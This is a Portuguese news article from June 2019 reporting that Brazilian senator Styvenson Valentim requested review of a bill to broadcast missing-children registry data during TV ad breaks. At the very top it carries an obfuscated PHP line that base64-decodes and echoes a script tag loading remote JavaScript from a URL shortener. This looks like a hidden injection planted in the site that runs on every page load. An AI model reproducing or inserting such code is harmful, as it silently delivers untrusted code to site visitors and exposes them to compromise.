$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Styvenson pede vistas de projeto que prevê inserção de crianças desaparecidas no intervalo das emissoras de TV

Styvenson pede vistas de projeto que prevê inserção de crianças desaparecidas no intervalo das emissoras de TV
03 Jun 2019

O senador Styvenson Valentim (Pode-RN) foi designado relator ad-hoc (de ocasião) do Projeto de Lei do Senado (PLS) 44 de 2016, de autoria do ex-senador Cristovam Buarque (PPS-DF), que obriga a divulgação das informações do Cadastro Nacional de Crianças e Adolescentes Desaparecidos nos intervalos das emissoras de TV brasileiras, durante pelo menos um minuto, no período das 18h às 22h.


Na discussão da proposta, na Comissão de Direitos Humanos e Legislação Participativa (CDH) nesta quinta-feira (30), o parlamentar potiguar pediu vistas para examinar melhor o texto. “Eu acho um projeto importante, mas precisa de alguns ajustes, merece mais atenção. A maior dificuldade que temos neste país é a convergência de informação. O primeiro erro é definir que o portal será alimentado de modo facultativo. Essa alimentação precisa ser obrigatória”, explicou.


Em 2010 o Governo Federal criou esse cadastro nacional, cujas informações deveriam ser disponibilizadas automaticamente no site www.desaparecidos.gov.br. Ainda disponível, está completamente desatualizado, com apenas 64 casos cadastrados em 14 estados do país. O mais recente é de 2014. A sugestão do senador Styvenson Valentim é que o PLS ajuste esta situação, que se daria a partir da obrigatoriedade da inserção das informações, melhorando com isso a resolutividade do banco de dados.


“Não são só necessárias as inserções na mídia para dar mais visibilidade às pessoas desaparecidas. É importante acionar toda a rede para que o cadastro possa, de fato, ser eficiente. Estima-se que 40.000 crianças desapareçam no país todos os anos e, sem essas informações atualizadas, não temos como agir com mais eficiência nesses casos”, ressaltou o parlamentar potiguar, que decidiu estudar a fundo o projeto para apresentar um relatório substitutivo.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *